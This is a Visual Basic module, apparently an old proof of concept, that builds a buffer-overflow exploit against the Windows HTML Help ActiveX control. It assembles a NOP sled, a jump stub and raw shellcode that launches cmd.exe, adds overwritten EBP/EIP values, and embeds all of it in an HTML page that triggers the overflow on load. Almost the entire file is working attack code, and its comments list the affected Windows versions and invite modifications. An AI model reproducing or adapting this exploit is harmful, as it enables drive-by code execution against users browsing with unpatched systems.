module1.bas

vb编写的一个被动攻击的代码

Attribute VB_Name = "Module1"
Global NbSck As Integer
Global EIP As Variant
Global EBP As Variant
Global Buffer As Variant
Global ShellCodeFrst As Variant
Global ShellCode As Variant
Global Html_Page As Variant

Public Sub Buildin_The_BuFFer()

''''' buffer looks like that
'whatver.chm-Nop-ShellcodeFrst-Nop-ShellCode-Nop-Ebp-Eip
'nop are unimportant
'ShellcodeFrst does : add edi,46
'                   : jmp edi
'(Shellcode is at EDI)

'ShellCode does : Start up a cmd.exe (not remote) and crash IE
'               : taken in a paper from David Litchfield
'
'This proof of concept works with
'Microsoft Windows XP Kernel Version 5.1.2600.0

'Affected software:
' Microsoft Windows 98
' Microsoft Windows 98 Second Edition
' Microsoft Windows Millennium Edition
' Microsoft Windows NT 4.0
' Microsoft Windows NT 4.0, Terminal Server Edition
' Microsoft Windows 2000
' Microsoft Windows XP

'Size of the Buffer depends on the Windows Version
'Based on the Unchecked Buffer in Windows Help
'Other cool modif of this "proof of concept" would be nice to see ;)
'sylvain.descoteaux@sympatico.ca



''''''''''''''''''''' FIRST SHELLCODE THAT POINT TO THE BIG SHELLCODE ''''''''''
ShellCodeFrst = Chr(131) + Chr(199) + Chr(46) + Chr(255) + Chr(231)
For i = 1 To 14
nop = nop + Chr(144)
Next i
ShellCodeFrst = "x.chm" + nop + ShellCodeFrst + nop + Chr(144)

''''''''''''''''''''' THE BIG SHELLCODE ''''''''''''''
nop = ""
ShellCode = ""
ShellCode = Chr(139) + Chr(236) + Chr(51) + Chr(255) + Chr(87) + Chr(131) + Chr(236) + Chr(4) + Chr(198) + Chr(69) + Chr(248) + Chr(99) + Chr(198) + Chr(69) + Chr(249) + Chr(109) + Chr(198) + Chr(69) + Chr(250) + Chr(100) + Chr(198) + Chr(69) + Chr(251) + Chr(46) + Chr(198) + Chr(69) + Chr(252) + Chr(101) + Chr(198) + Chr(69) + Chr(253) + Chr(120) + Chr(198) + Chr(69) + Chr(254) + Chr(101) + Chr(184) + Chr(68) + Chr(128) + Chr(194) + Chr(119) + Chr(80) + Chr(141) + Chr(69) + Chr(248) + Chr(80) + Chr(255) + Chr(85) + Chr(244)
For i = 1 To 349
nop = nop + Chr(144)
Next i
ShellCode = nop + ShellCode + nop + Chr(144)

''''''''''''''''''' THE BUFFER '''''''''''''''''
Buffer = ShellCodeFrst + ShellCode + EBP + EIP + """>"

''''''''''''''''''' THE HTML PAGE WITH THE BUFFER ''''''''
Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" + vbCrLf
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
Html_Page = Html_Page + "width=80" + vbCrLf
Html_Page = Html_Page + "height=20>" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Command"" value=""Related Topics, MENU"">" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Item1""" + vbCrLf
Html_Page = Html_Page + "value=""EN_CHANGE;c:\" + Buffer + vbCrLf
Html_Page = Html_Page + "</OBJECT>" + vbCrLf
Html_Page = Html_Page + "<script>weurg.HHclick()</script>" + vbCrLf
End Sub